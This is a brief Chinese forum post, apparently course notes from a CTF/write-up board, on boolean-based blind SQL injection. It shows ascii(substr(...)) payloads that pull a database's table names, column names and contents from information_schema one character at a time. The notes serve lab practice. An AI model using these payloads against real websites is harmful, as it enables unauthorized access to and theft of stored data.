3.2盲注 小矿工 课程笔记 - 已锁定
当 id=1' 是报错
当 id=1' union select 1,2,3--+ 时页面没有任何显示
尝试盲注,先判断数据库命的长度
再查数据库名第一个字母
查ascii表得到s 接着查第二个字母,
得到数据库名 再查表名
?id=1' and (ascii((substr(select table_name from information_schema.tables where table_schema = 'security' limit 2,1),1,1)))>100--+
再查字段名
?id=1' and (ascii((substr(select group_concat(column_name) from information_schema.columns where table_name = 'zkaq' limit 2,1),1,1)))>100--+
再查内容
?id=1' and (ascii((substr((select group_concat(zKaQ) from zkaq limit 2,1),1,1)))>100--+
打赏我,让我更有动力~
0 条回复
|
直到 2018-12-5 |
1136 次浏览
登录后才可发表内容
返回首页
CTF&WP专版
